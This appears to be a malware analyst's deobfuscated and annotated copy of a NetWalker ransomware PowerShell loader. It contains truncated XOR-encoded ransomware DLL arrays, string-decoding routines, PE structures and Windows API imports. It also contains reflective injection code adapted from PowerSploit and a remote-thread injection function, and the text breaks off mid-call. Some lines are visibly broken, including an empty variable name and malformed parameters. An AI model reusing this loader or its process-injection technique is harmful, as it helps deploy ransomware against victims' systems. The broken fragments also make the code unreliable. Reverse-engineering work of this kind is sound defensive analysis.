# [byte[]]$KdtMGBDf=@(0xe3,0xf4,0x3e,0xae,0xad,0xae,0xae,0xae,0xaa,0xae,0xae,0xae,0x51,0x51,0xae,...)
# XORed DLL, Scriptblock 1-16
# KdtMGBDf = netwalker_32bit_dll
[byte[]]$netwalker_32bit_dll=@(0xe3,0xf4,0x3e,0xae,0xad,0xae,0xae,0xae,0xaa,0xae,0xae,0xae,0x51,0x51,0xae,...)
# [byte[]]$JSavlCRkvJtfAgC=@(0x3c,0x2b,0xe1,0x71,0x72,0x71,0x71,0x71,0x75,0x71,0x71,0x71,0x8e,0x8e,...)
# XORed DLL, Scriptblock 17-48
# JSavlCRkvJtfAgC = netwalker_64bit_dll
[byte[]]$netwalker_64bit_dll=@(0x3c,0x2b,0xe1,0x71,0x72,0x71,0x71,0x71,0x75,0x71,0x71,0x71,0x8e,0x8e,...)
function base64_decode_and_xor # XRHWxMEePcnJxrpvlimQ
{
<#
Decodes a string using base64 and an xor key
Returns an ascii sctring
#>
param
(
[Parameter(Position = 0 , Mandatory = $true)] [string] $base64_string, # $YvlsIRFwgnkMDzXYS
[Parameter(Position = 1 , Mandatory = $true)] [byte] $xor_key # $PCLtzXNRvMcLnUgYii
)
# FHRBphVzK = return_value
$return_value = [System.Convert]::FromBase64String( $base64_string )
# XjjgpVWtoEQjAWA = iterator
for ( $iterator = 0; $iterator -lt $return_value.length; $iterator++ )
{
$return_value[$iterator] = $return_value[$iterator] -bxor $xor_key
}
return [System.Text.Encoding]::ASCII.GetString( $return_value )
}
<#
Struct names reverse engineered from PowerSploit
Obfuscated names are retained as comments if item is used later
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
The main difference between this sample and PowerSploit is this string being used with Add-Type in lieu of using TypeBuilder directly
#>
# $CFLtdj = base64_decode_and_xor 'fXthZm8oW3F7...' 0x08
# CFLtdj = c_sharp_types
$c_sharp_types =
using System;
using System.Runtime.InteropServices;
namespace c_sharp_namespace # fPuFahpIFbqHqZeAp
{
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_BASE_RELOCATION # xVkotwIzCdIxoecFxxB
{
public UInt32 VirtualAddress; # KNTfPafdZOCofQaJgEP
public UInt32 SizeOfBlock; # hPdWWZ
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_DOS_HEADER # hCcDWybZKdaSN
{
public UInt16 e_magic;
public UInt16 e_cblp;
public UInt16 e_cp;
public UInt16 e_crlc;
public UInt16 e_cparhdr;
public UInt16 e_minalloc;
public UInt16 e_maxalloc;
public UInt16 e_ss;
public UInt16 e_sp;
public UInt16 e_csum;
public UInt16 e_ip;
public UInt16 e_cs;
public UInt16 e_lfarlc;
public UInt16 e_ovno;
[MarshalAs(UnmanagedType.ByValArray,SizeConst=4)]
public UInt16 [] e_res;
public UInt16 e_oemid;
public UInt16 e_oeminfo;
[MarshalAs(UnmanagedType.ByValArray,SizeConst=10)]
public UInt16[] e_res2;
public Int32 e_lfanew # lHrsl;
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_FILE_HEADER # bbenPnsBufmEjxttCRkm
{
public UInt16 Machine;
public UInt16 NumberOfSections; # meHP
public UInt32 TimeDateStamp;
public UInt32 PointerToSymbolTable;
public UInt32 NumberOfSymbols;
public UInt16 SizeOfOptionalHeader;
public UInt16 Characteristics;
}
[StructLayout(LayoutKind.Sequential,Size=8)]
public struct IMAGE_DATA_DIRECTORY # SPlBXkrxnUvff
{
public UInt32 VirtualAddress; # lUYQYtL
public UInt32 Size;
}
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_OPTIONAL_HEADER64 # OsEetGCiWIOpAkd
{
[FieldOffset(0)]
public UInt16 Magic;
[FieldOffset(2)]
public byte MajorLinkerVersion;
[FieldOffset(3)]
public byte MinorLinkerVersion;
[FieldOffset(4)]
public uint SizeOfCode;
[FieldOffset(8)]
public uint SizeOfInitializedData;
[FieldOffset(12)]
public uint SizeOfUninitializedData;
[FieldOffset(16)]
public uint AddressOfEntryPoint; # bpKrNcbQLvVIQfMH
[FieldOffset(20)]
public uint BaseOfCode;
[FieldOffset(24)]
public ulong ImageBase; # TsxFfuCtQaEfLHwz
[FieldOffset(32)]
public uint SectionAlignment;
[FieldOffset(36)]
public uint FileAlignment;
[FieldOffset(40)]
public ushort MajorOperatingSystemVersion;
[FieldOffset(42)]
public ushort MinorOperatingSystemVersion;
[FieldOffset(44)]
public ushort MajorImageVersion;
[FieldOffset(46)]
public ushort MinorImageVersion;
[FieldOffset(48)]
public ushort MajorSubsystemVersion;
[FieldOffset(50)]
public ushort MinorSubsystemVersion;
[FieldOffset(52)]
public uint Win32VersionValue;
[FieldOffset(56)]
public uint SizeOfImage; #OsTBbVQ
[FieldOffset(60)]
public uint SizeOfHeaders;
[FieldOffset(64)]
public uint CheckSum;
[FieldOffset(68)]
public UInt16 Subsystem;
[FieldOffset(70)]
public UInt16 DllCharacteristics;
[FieldOffset(72)]
public ulong SizeOfStackReserve;
[FieldOffset(80)]
public ulong SizeOfStackCommit;
[FieldOffset(88)]
public ulong SizeOfHeapReserve;
[FieldOffset(96)]
public ulong SizeOfHeapCommit;
[FieldOffset(104)]
public uint LoaderFlags;
[FieldOffset(108)]
public uint NumberOfRvaAndSizes;
[FieldOffset(112)]
public IMAGE_DATA_DIRECTORY ExportTable;
[FieldOffset(120)]
public IMAGE_DATA_DIRECTORY ImportTable;
[FieldOffset(128)]
public IMAGE_DATA_DIRECTORY ResourceTable;
[FieldOffset(136)]
public IMAGE_DATA_DIRECTORY ExceptionTable;
[FieldOffset(144)]
public IMAGE_DATA_DIRECTORY CertificateTable;
[FieldOffset(152)]
public IMAGE_DATA_DIRECTORY BaseRelocationTable; # sHSzhUl
[FieldOffset(160)]
public IMAGE_DATA_DIRECTORY Debug;
[FieldOffset(168)]
public IMAGE_DATA_DIRECTORY Architecture;
[FieldOffset(176)]
public IMAGE_DATA_DIRECTORY GlobalPtr;
[FieldOffset(184)]
public IMAGE_DATA_DIRECTORY TLSTable;
[FieldOffset(192)]
public IMAGE_DATA_DIRECTORY LoadConfigTable;
[FieldOffset(200)]
public IMAGE_DATA_DIRECTORY BoundImport;
[FieldOffset(208)]
public IMAGE_DATA_DIRECTORY IAT;
[FieldOffset(216)]
public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
[FieldOffset(224)]
public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
[FieldOffset(232)]
public IMAGE_DATA_DIRECTORY Reserved;
}
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_OPTIONAL_HEADER32 # HbIuuAHGS
{
[FieldOffset(0)]
public UInt16 Magic;
[FieldOffset(2)]
public byte MajorLinkerVersion;
[FieldOffset(3)]
public byte MinorLinkerVersion;
[FieldOffset(4)]
public uint SizeOfCode;
[FieldOffset(8)]
public uint SizeOfInitializedData;
[FieldOffset(12)]
public uint SizeOfUninitializedData;
[FieldOffset(16)]
public uint AddressOfEntryPoint; # bpKrNcbQLvVIQfMH
[FieldOffset(20)]
public uint BaseOfCode;
[FieldOffset(24)]
public uint BaseOfData;
[FieldOffset(28)]
public uint ImageBase; # TsxFfuCtQaEfLHwz
[FieldOffset(32)]
public uint SectionAlignment;
[FieldOffset(36)]
public uint FileAlignment;
[FieldOffset(40)]
public ushort MajorOperatingSystemVersion;
[FieldOffset(42)]
public ushort MinorOperatingSystemVersion;
[FieldOffset(44)]
public ushort MajorImageVersion;
[FieldOffset(46)]
public ushort MinorImageVersion;
[FieldOffset(48)]
public ushort MajorSubsystemVersion;
[FieldOffset(50)]
public ushort MinorSubsystemVersion;
[FieldOffset(52)]
public uint Win32VersionValue;
[FieldOffset(56)]
public uint SizeOfImage; #OsTBbVQ
[FieldOffset(60)]
public uint SizeOfHeaders;
[FieldOffset(64)]
public uint CheckSum;
[FieldOffset(68)]
public UInt16 Subsystem;
[FieldOffset(70)]
public UInt16 DllCharacteristics;
[FieldOffset(72)]
public uint SizeOfStackReserve;
[FieldOffset(76)]
public uint SizeOfStackCommit;
[FieldOffset(80)]
public uint SizeOfHeapReserve;
[FieldOffset(84)]
public uint SizeOfHeapCommit;
[FieldOffset(88)]
public uint LoaderFlags;
[FieldOffset(92)]
public uint NumberOfRvaAndSizes;
[FieldOffset(96)]
public IMAGE_DATA_DIRECTORY ExportTable;
[FieldOffset(104)]
public IMAGE_DATA_DIRECTORY ImportTable;
[FieldOffset(112)]
public IMAGE_DATA_DIRECTORY ResourceTable;
[FieldOffset(120)]
public IMAGE_DATA_DIRECTORY ExceptionTable;
[FieldOffset(128)]
public IMAGE_DATA_DIRECTORY CertificateTable;
[FieldOffset(136)]
public IMAGE_DATA_DIRECTORY BaseRelocationTable; # sHSzhUl
[FieldOffset(144)]
public IMAGE_DATA_DIRECTORY Debug;
[FieldOffset(152)]
public IMAGE_DATA_DIRECTORY Architecture;
[FieldOffset(160)]
public IMAGE_DATA_DIRECTORY GlobalPtr;
[FieldOffset(168)]
public IMAGE_DATA_DIRECTORY TLSTable;
[FieldOffset(176)]
public IMAGE_DATA_DIRECTORY LoadConfigTable;
[FieldOffset(184)]
public IMAGE_DATA_DIRECTORY BoundImport;
[FieldOffset(192)]
public IMAGE_DATA_DIRECTORY IAT;
[FieldOffset(200)]
public IMAGE_DATA_DIRECTORY DelayImportDescriptor;
[FieldOffset(208)]
public IMAGE_DATA_DIRECTORY CLRRuntimeHeader;
[FieldOffset(216)]
public IMAGE_DATA_DIRECTORY Reserved;
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_NT_HEADERS64 # aJhUaoOyxheuYqkt
{
public UInt32 Signature;
public IMAGE_FILE_HEADER FileHeader; # ieXTLzdPluakFNsUxjt;
public IMAGE_OPTIONAL_HEADER64 OptionalHeader; # XmMXLkNENoDVv
}
[StructLayout(LayoutKind.Sequential)]
public struct IMAGE_NT_HEADERS32 # PtHwbkdrYOpsX
{
public UInt32 Signature;
public IMAGE_FILE_HEADER FileHeader; # ieXTLzdPluakFNsUxjt
public IMAGE_OPTIONAL_HEADER32 OptionalHeader; # XmMXLkNENoDVv
}
[StructLayout(LayoutKind.Explicit)]
public struct IMAGE_SECTION_HEADER # UFRlSclRQl
{
[FieldOffset(0)]
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public char[] Name;
[FieldOffset(8)]
public UInt32 VirtualSize;
[FieldOffset(12)]
public UInt32 VirtualAddress; # aLroQpmk
[FieldOffset(16)]
public UInt32 SizeOfRawData; # YUaXybWigWHWb;
[FieldOffset(20)]
public UInt32 PointerToRawData; # AbkcPToa
[FieldOffset(24)]
public UInt32 PointerToRelocations;
[FieldOffset(28)]
public UInt32 PointerToLinenumbers;
[FieldOffset(32)]
public UInt16 NumberOfRelocations;
[FieldOffset(34)]
public UInt16 NumberOfLinenumbers;
[FieldOffset(36)]
public UInt32 Characteristics;
}
}
# $VlssLemZ = base64_decode_and_xor '7fLa2v/bxtnEwp6U3...' 0xb6
# $VlssLemZ = dll_imports
$dll_imports =
[DllImport("kernel32.dll",SetLastError = true, EntryPoint = "VirtualAlloc")]
# public static extern IntPtr gmXUzA(IntPtr nUwpSJQCLFW,UIntPtr HExXZbS,UInt32 CczO,UInt32 thwP);
# gmXUzA = VirtualAlloc_ptr
public static extern IntPtr VirtualAlloc_ptr(IntPtr nUwpSJQCLFW,UIntPtr HExXZbS,UInt32 CczO,UInt32 thwP);
[DllImport("kernel32.dll",SetLastError = true,EntryPoint = "GetProcAddress")]
# public static extern IntPtr jgBhLtX(IntPtr RrGWYX,string CTeBwKGLaHBavtlobBc);
# jgBhLtX = GetProcAddress_ptr
# NOT USED
public static extern IntPtr GetProcAddress_ptr(IntPtr RrGWYX,string CTeBwKGLaHBavtlobBc);
[DllImport("kernel32.dll",SetLastError = true,EntryPoint = "LoadLibraryA")]
#public static extern IntPtr bhTfqb(string DNZCQEDTU);
# bhTfqb = LoadLibraryA_ptr
# NOT USED
public static extern IntPtr LoadLibraryA(string DNZCQEDTU);
[DllImport("kernel32.dll",SetLastError = true,EntryPoint = "WriteProcessMemory")]
#public static extern bool KQRW(IntPtr eYQXML,IntPtr glEoEWFId,IntPtr cjoDIHrJ,UIntPtr kNrRSldEQ,ref UIntPtr bjmzbCFQPhKAyWUAMT);
# KQRW = WriteProcessMemory_ptr
public static extern bool WriteProcessMemory_ptr(IntPtr eYQXML,IntPtr glEoEWFId,IntPtr cjoDIHrJ,UIntPtr kNrRSldEQ,ref UIntPtr bjmzbCFQPhKAyWUAMT);
[DllImport("kernel32.dll",SetLastError = true,EntryPoint = "VirtualFree")]
#public static extern bool aVugT(IntPtr iHPUFrx , UIntPtr KBfog ,UInt32 PnpMntDouHrtjatzSOs);
# aVugT = VirtualFree_ptr
public static extern bool VirtualFree_ptr(IntPtr iHPUFrx , UIntPtr KBfog ,UInt32 PnpMntDouHrtjatzSOs);
[DllImport("kernel32.dll",SetLastError = true,EntryPoint = "GetCurrentProcess")]
# public static extern IntPtr ZFRmCPQieZVFTBTIEHDd();
# ZFRmCPQieZVFTBTIEHDd = GetCurrentProcess_ptr
public static extern IntPtr GetCurrentProcess_ptr();
[DllImport("kernel32.dll",SetLastError = true,EntryPoint = "CloseHandle")]
# public static extern bool DhC(IntPtr DKcGJGWuIiCqPJEeVooI);
# DhC = CloseHandle_ptr
public static extern bool DhC(IntPtr DKcGJGWuIiCqPJEeVooI);
[DllImport("kernel32.dll", SetLastError=true,EntryPoint = "VirtualAllocEx")]
# public static extern IntPtr dGJfHfj(IntPtr UeRiBCD, IntPtr kPKQAehjstH, UIntPtr AFKJeNcrqQ, UInt32 MdFZQFRxZlkYuYDrfHZE, UInt32 EpIngI);
# dGJfHfj = VirtualAllocEx_ptr
public static extern IntPtr VirtualAllocEx_ptr(IntPtr UeRiBCD, IntPtr kPKQAehjstH, UIntPtr AFKJeNcrqQ, UInt32 MdFZQFRxZlkYuYDrfHZE, UInt32 EpIngI);
[DllImport("kernel32.dll", SetLastError=true,EntryPoint = "VirtualProtectEx")]
# public static extern bool ghsckiHLNVy( IntPtr tzDztSbOkCQgusSEv, IntPtr vJUZwyBMJ, UIntPtr lRErMXptPsavuY, UInt32 pOQXvhblbmMwhbCDI, ref UInt32 bzAfjifXJElqzYHl);
# ghsckiHLNVy = VirtualProtectEx_ptr
public static extern bool VirtualProtectEx_ptr( IntPtr tzDztSbOkCQgusSEv, IntPtr vJUZwyBMJ, UIntPtr lRErMXptPsavuY, UInt32 pOQXvhblbmMwhbCDI, ref UInt32 bzAfjifXJElqzYHl);
[DllImport("kernel32.dll", SetLastError = true,EntryPoint = "OpenProcess")]
# public static extern IntPtr YNwUrMRhd( UInt32 RlLAScNS, bool cMhFGlAnnj, UInt32 apQXygNcqfDkFduB );
# YNwUrMRhd = OpenProcess_ptr
public static extern IntPtr OpenProcess_ptr( UInt32 RlLAScNS, bool cMhFGlAnnj, UInt32 apQXygNcqfDkFduB );
[DllImport("kernel32.dll",EntryPoint = "CreateRemoteThread")]
# public static extern IntPtr yKiDOexBPaPwJ(IntPtr ZaZKwrdQhhX, IntPtr WyqUPGMzHGJANdfnXJ, UInt32 RVwDgpIW, IntPtr DLMJ, IntPtr CnpUeWpfBQvUD, UInt32 XQoImxvKXmvMUGpjPuHq, IntPtr Ingyvf);
# yKiDOexBPaPwJ = CreateRemoteThread_ptr
public static extern IntPtr CreateRemoteThread_ptr(IntPtr ZaZKwrdQhhX, IntPtr WyqUPGMzHGJANdfnXJ, UInt32 RVwDgpIW, IntPtr DLMJ, IntPtr CnpUeWpfBQvUD, UInt32 XQoImxvKXmvMUGpjPuHq, IntPtr Ingyvf);
# $Vfej = base64_decode_and_xor 'CxUSHQwV' 0x5c
# base64_decode_and_xor 'string' 0xKEY
# $Vfej = string_WINAPI
$string_WINAPI = "WINAPI"
# $dxeRvWVxJVCMcBRT = base64_decode_and_xor 'lYW+t6Sm' 0xd6
# base64_decode_and_xor 'string' 0xKEY
# $dxeRvWVxJVCMcBRT = string_CSharp
$string_CSharp = "CSharp"
Add-Type -TypeDefinition $c_sharp_types -Language $string_CSharp
# Adds defined .NET Core classes to PowerShell session
# $viZTKqyHmTGGPGyQov = Add-Type -MemberDefinition $dll_imports -Name 'viZTKqyHmTGGPGyQov' ...
# $viZTKqyHmTGGPGyQov = imported_winapi_functions
$imported_winapi_functions = Add-Type -MemberDefinition $dll_imports -Name 'imported_winapi_functions' -Namespace $string_WINAPI -PassThru
Function Sub-SignedIntAsUnsigned # LSjevmBSTK
{
<#
Name taken from matching PowerSploit function
"This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses"
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
#>
Param
(
[Parameter(Position = 0, Mandatory = $true)] [Int64] $ptr_param0, # EgQQNConBrV
[Parameter(Position = 1, Mandatory = $true)] [Int64] $ptr_param1 # vXcCSVlHAJPf
)
# [Byte[]]$esXmCdoHfyPxARZpND = [BitConverter]::GetBytes($EgQQNConBrV)
# esXmCdoHfyPxARZpND = param0_bytes
[Byte[]]$ptr_param0_bytes = [BitConverter]::GetBytes($ptr_param0)
# [Byte[]]$EXzqjUAQjBtWPIHJX = [BitConverter]::GetBytes($vXcCSVlHAJPf)
# EXzqjUAQjBtWPIHJX = param1_bytes
[Byte[]]$ptr_param1_bytes = [BitConverter]::GetBytes($ptr_param1)
#[Byte[]]$ClDrzkYVeKbyeH = [BitConverter]::GetBytes([UInt64]0)
# ClDrzkYVeKbyeH = result_bytes
[Byte[]]$return_val = [BitConverter]::GetBytes([UInt64]0)
if ($param0_bytes.Count -eq $param1_bytes.Count)
{
# UpqkcOEjw = counter
$counter = 0
# BeZeQEUe = iterator
for ($iterator = 0; $iterator -lt $param0_bytes.Count; $iterator++)
{
# YoSoTrFF = param0_byte_minus_counter
$ptr_param0_byte_minus_counter = $ptr_param0_bytes[$iterator] - $counter
if ($ptr_param0_byte_minus_counter -lt $ptr_param1_bytes[$iterator])
{
$ptr_param0_byte_minus_counter += 256
$counter = 1
}
else
{
$counter = 0
}
# [UInt16]$UhUkZYnDsebuXxRnnC = $YoSoTrFF - $EXzqjUAQjBtWPIHJX[$BeZeQEUe]
# UhUkZYnDsebuXxRnnC = difference
[UInt16]$difference = $ptr_param0_byte_minus_counter - $ptr_param1_bytes[$iterator]
$return_val[$iterator] = $difference -band 0x00FF
}
}
else
{
Throw
}
return [BitConverter]::ToInt64($return_val, 0)
}
Function Add-SignedIntAsUnsigned # vNDVRBzRTZhi
{
<#
Name taken from matching PowerSploit function
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
#>
Param
(
[Parameter(Position = 0, Mandatory = $true)] [Int64] $param0, #HMN (pointer)
[Parameter(Position = 1, Mandatory = $true)] [Int64] $param1 #yjiytjAKNdg
)
# [Byte[]]$Zes = [BitConverter]::GetBytes($HMN)
# Zes = param0_bytes
[Byte[]]$param0_bytes = [BitConverter]::GetBytes($param0)
# [Byte[]]$enlcayEfWPxfeHVhUDZV = [BitConverter]::GetBytes($yjiytjAKNdg)
# enlcayEfWPxfeHVhUDZV = param1_bytes
[Byte[]]$param1_bytes = [BitConverter]::GetBytes($param1)
# [Byte[]]$XOQkAIw = [BitConverter]::GetBytes([UInt64]0)
# XOQkAIw = return_vals
[Byte[]]$return_vals = [BitConverter]::GetBytes([UInt64]0)
if ($param0_bytes.Count -eq $param1_bytes.Count)
{
# OGHHifzplqpgRila = counter
$counter = 0
# EZfdWugmh = iterator
for ($iterator = 0; $iterator -lt $param0_bytes.Count; $iterator++)
{
# [UInt16]$dbGAJAkGhfV = $param0_bytes[$iterator] + $param1_bytes[$iterator] + $counter
# dbGAJAkGhfV = temp_var
[UInt16]$temp_var = $param0_bytes[$iterator] + $param1_bytes[$iterator] + $counter
$return_vals[$iterator] = $temp_var -band 0x00FF
if (($temp_var -band 0xFF00) -eq 0x100)
{
$counter = 1
}
else
{
$counter = 0
}
}
}
return [BitConverter]::ToInt64($return_vals, 0)
}
Function convert_to_int_64 # pSytWkLF
{
Param
(
[Parameter(Position = 0, Mandatory = $true)] [UInt64] $convert_to_int_64_param0 #WDqmGEcBIrFM
)
[Byte[]]$convert_to_int_64_result = [BitConverter]::GetBytes($convert_to_int_64_param0)
return ([BitConverter]::ToInt64($convert_to_int_64_result, 0))
}
Function convert_to_unsigned_int_16 # zratHjJXxf
{
Param
(
[Parameter(Position = 0, Mandatory = $true)] [Int16] $convert_to_unsigned_int_16_param0 #mquKCOH
)
[Byte[]]$convert_to_unsigned_int_16_result = [BitConverter]::GetBytes($convert_to_unsigned_int_16_param0)
return ([BitConverter]::ToUInt16($convert_to_unsigned_int_16_result, 0))
}
Function Get-DelegateType # hanAqvETmUGlzBlWSy
{
<#
Name taken from matching PowerSploit function
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
#>
Param( [OutputType([Type])]
[Parameter( Position = 0)] [Type[]] $param0_object_ptr_unit32_ptr = (New-Object Type[](0)), #qplqlGbYGxTvTgyrSYYL
[Parameter( Position = 1 )] [Type] $param1_bool = [Void] ) #rVdvsPDmivnnpS
# $IRmklMuaOyiZkw = [AppDomain]::CurrentDomain
# IRmklMuaOyiZkw = current_domain
$current_domain = [AppDomain]::CurrentDomain
# $eZespMYMhNeIt = New-Object Reflection.AssemblyName( $( base64_decode_and_xor 'Wm1uZG1rfG1sTG1kbW9pfG0=' 0x08 ) )
# $eZespMYMhNeIt = New-Object Reflection.AssemblyName("ReflectedDelegate")
# As seen in PowerSploit/invoke-DllInjection
# $eZespMYMhNeIt = object_ReflectedDelegate
$object_ReflectedDelegate = New-Object Reflection.AssemblyName("ReflectedDelegate")
# $KgCqeAFeTo = $current_domain.DefineDynamicAssembly($object_ReflectedDelegate, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
# KgCqeAFeTo = assembly_builder_access_run
$assembly_builder_access_run = $current_domain.DefineDynamicAssembly($object_ReflectedDelegate, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
# $JFrdjMWMS = $assembly_builder_access_run.DefineDynamicModule( $( base64_decode_and_xor 'Wn1edn58YWpefHdmf3Y=' 0x13 ), $false)
# $JFrdjMWMS = $assembly_builder_access_run.DefineDynamicModule( "InMemoryModule", $false)
# $JFrdjMWMS = dynamic_module_InMemoryModule
$dynamic_module_InMemoryModule = $assembly_builder_access_run.DefineDynamicModule( "InMemoryModule", $false)
# $XNsSViZdeCoTgd = $dynamic_module_InMemoryModule.DefineType( $( base64_decode_and_xor 'fEh1VF1UVlBFVGVIQVQ=' 0x31 ),
# $( base64_decode_and_xor 'QG9icHAvI1N2YW9qYC8jUGZib2ZnLyNCbXBqQG9icHAvI0J2d2xAb2JwcA==' 0x03 ),
# [System.MulticastDelegate])
# $XNsSViZdeCoTgd = $dynamic_module_InMemoryModule.DefineType( "MyDelegateType", "Class, Public, Sealed, AnsiClass, AutoClass", [System.MulticastDelegate])
# $XNsSViZdeCoTgd = dynamic_assembly_with_types
$dynamic_assembly_with_types = $dynamic_module_InMemoryModule.DefineType( "MyDelegateType", "Class, Public, Sealed, AnsiClass, AutoClass", [System.MulticastDelegate])
# $VdXvMpAnrIoYFQuat = $dynamic_assembly_with_types.DefineConstructor( $( base64_decode_and_xor 'ZWNkR1JUXlZbeVZaUhsXf15TUnVOZF5QGxdnQlVbXlQ=' 0x37 ),
# [System.Reflection.CallingConventions]::Standard, $param0)
# $VdXvMpAnrIoYFQuat = $dynamic_assembly_with_types.DefineConstructor( "RTSpecialName, HideBySig, Public", [System.Reflection.CallingConventions]::Standard, $param0)
# VdXvMpAnrIoYFQuat = dynamic_assembly_with_constructor
$dynamic_assembly_with_constructor = $dynamic_assembly_with_types.DefineConstructor( "RTSpecialName, HideBySig, Public", [System.Reflection.CallingConventions]::Standard, $param0_object_ptr_unit32_ptr)
# $dynamic_assembly_with_constructor.SetImplementationFlags( $( base64_decode_and_xor 'Q2R/ZXh8dD0xXHB/cHZ0dQ==' 0x11 ))
$dynamic_assembly_with_constructor.SetImplementationFlags( "Runtime, Managed")
# $WnIZfxlZRoymLA = $dynamic_assembly_with_types.DefineMethod( $( base64_decode_and_xor 'm7ykvbm3' 0xd2 ),
# $( base64_decode_and_xor 'weTz/fjyvbHZ+PX00+jC+Pa9sd/05sL9/uW9scf44+Xk8P0=' 0x91 ),
# $param1,
# $param0)
#
# $WnIZfxlZRoymLA = $dynamic_assembly_with_types.DefineMethod( "Invoke", "Public, HideBySig, NewSlot, Virtual", $param1, $param0)
# WnIZfxlZRoymLA = dynamic_assembly_with_method
$dynamic_assembly_with_method = $dynamic_assembly_with_types.DefineMethod( $dynamic_assembly_with_types.DefineMethod( "Invoke", "Public, HideBySig, NewSlot, Virtual", $param1_bool, $param0_object_ptr_unit32_ptr)
#$dynamic_assembly_with_method.SetImplementationFlags($( base64_decode_and_xor 'Q2R/ZXh8dD0xXHB/cHZ0dQ==' 0x11 ) )
$dynamic_assembly_with_method.SetImplementationFlags( "Runtime, Managed" )
return $dynamic_assembly_with_types.CreateType()
}
function Update-MemoryAddresses # wkOXGsOamphSrP
{
<#
Name taken from matching PowerSploit function
https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
#>
param
(
[Parameter(Position = 0 , Mandatory = $true)] [IntPtr] $ptr_allocated_memory, # OynlsNiFkgC
[Parameter(Position = 1 , Mandatory = $true)] [IntPtr] $ptr_allocated_memory2, # ddxsvl
[Parameter(Position = 2 , Mandatory = $true)] [UInt32] $nt_header_32or64.OptionalHeader.BaseRelocationTable.VirtualAddress, #BmnMtsYAQpgHgAs
[Parameter(Position = 3 , Mandatory = $true)] [System.IntPtr] $(convert_to_int_64 $nt_header_32or64.OptionalHeader.ImageBase ) # KHgKELkpT
)
# VSSslI = int_ptr_size_var
$ = 0xa000
if([System.IntPtr]::Size -eq 4)
{
$int_ptr_size_var = 0x3000
}
if($nt_header_32or64.OptionalHeader.BaseRelocationTable.VirtualAddress -eq 0)
{
return $false
}
# XDqw = base_difference
$base_difference = Sub-SignedIntAsUnsigned $ptr_allocated_memory2 $(convert_to_int_64 $nt_header_32or64.OptionalHeader.ImageBase )
# jGUsqSPQN = base_reloc
$base_reloc = Add-SignedIntAsUnsigned $ptr_allocated_memory_SizeOfImage $(convert_to_int_64 $nt_header_32or64.OptionalHeader.BaseRelocationTable.VirtualAddress)
# zxDMct = data_directory
$data_directory = [System.Runtime.InteropServices.Marshal]::PtrToStructure($base_reloc,[Type][c_sharp_namespace.IMAGE_DATA_DIRECTORY])
while ($data_directory.IMAGE_DATA_DIRECTORY)
{
# DHRfSia = offset_to_reloc_table
$offset_to_reloc_table = Add-SignedIntAsUnsigned $ptr_allocated_memory_SizeOfImage $(convert_to_int_64 $data_directory.IMAGE_DATA_DIRECTORY)
# jzMfdLT = reloc_type
$reloc_type = ($data_directory.Size - ([UInt32]8)) /2
# SFVeRvecbOterEYx = base_reloc_plus_8
$base_reloc_plus_8 = Add-SignedIntAsUnsigned $base_reloc 8
# LLzF = iterator
for($iterator=0;$iterator -lt $reloc_type ; $iterator++)
{
# txKTTOieVXEq = uint_16
$uint_16 = convert_to_unsigned_int_16 $([System.Runtime.InteropServices.Marshal]::ReadInt16($base_reloc_plus_8))
if( $($uint_16 -band $int_ptr_size_var) -eq $int_ptr_size_var)
{
# QjZhVJApAzECuhE = int_ptr_size_correction
$int_ptr_size_correction = $uint_16 -band 0xfff
# $ocdrdt = reloc_table_corrected
$reloc_table_corrected = Add-SignedIntAsUnsigned $offset_to_reloc_table $int_ptr_size_correction
# VlwpK = final_addr
$final_addr = Add-SignedIntAsUnsigned $([System.Runtime.InteropServices.Marshal]::ReadIntPtr($final_addr)) $base_difference
[System.Runtime.InteropServices.Marshal]::WriteIntPtr($final_addr,$corrected_to_strcut_1_with_diff)
}
$base_reloc_plus_8 = Add-SignedIntAsUnsigned $base_reloc_plus_8 2
}
$base_reloc = Add-SignedIntAsUnsigned $base_reloc $(convert_to_int_64 $data_directory.Size)
$data_directory = [System.Runtime.InteropServices.Marshal]::PtrToStructure($base_reloc,[Type][c_sharp_namespace.IMAGE_DATA_DIRECTORY])
}
return $true
}
function malware_create_remote_thread # kFbjwpzZnuDCwsZQWb
{
param
(
[Parameter(Position = 0 , Mandatory = $true)] [UInt32] $process_id, # TiPGvdwdLbIzlXpC,
[Parameter(Position = 1 , Mandatory = $true)] [IntPtr] $ptr_allocated_memory, # VQCkOGIn
[Parameter(Position = 2 , Mandatory = $true)] [UInt32] $nt_header_32or64.OptionalHeader.SizeOfImage, # VDXx
[Parameter(Position = 3 , Mandatory = $true)] [UInt32] $nt_header_32or64.OptionalHeader.AddressOfEntryPoint, # NcTsjIUZBxzLA
[Parameter(Position = 4 , Mandatory = $true)] [bool] $flag_64_bit, # cum
[Parameter(Position = 5 , Mandatory = $true)] [ref] $local_return_flag # ZMbJdukE
)
$local_return_flag.value = $false
# $hwqSPWCcaurFZvXZWp = process_handle
$process_handle = $imported_winapi_functions::OpenProcess_ptr(
[UInt32]0x43A, # dwDesiredAccess (PROCESS_QUERY_INFORMATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_VM_OPERATION, PROCESS_CREATE_THREAD)
$false, # bInheritHandle
[UInt32]$process_id ) # dwProcessId
if ( $process_handle -ne 0 )
{
# wcqtYbiNQsDYttaJqMzt = ptr_allocated_memory_SizeOfImage
$ptr_allocated_memory_SizeOfImage = $imported_winapi_functions::VirtualAlloc_ptr(
0,
$nt_header_32or64.OptionalHeader.SizeOfImage,
0x00001000 -bor 0x00002000,
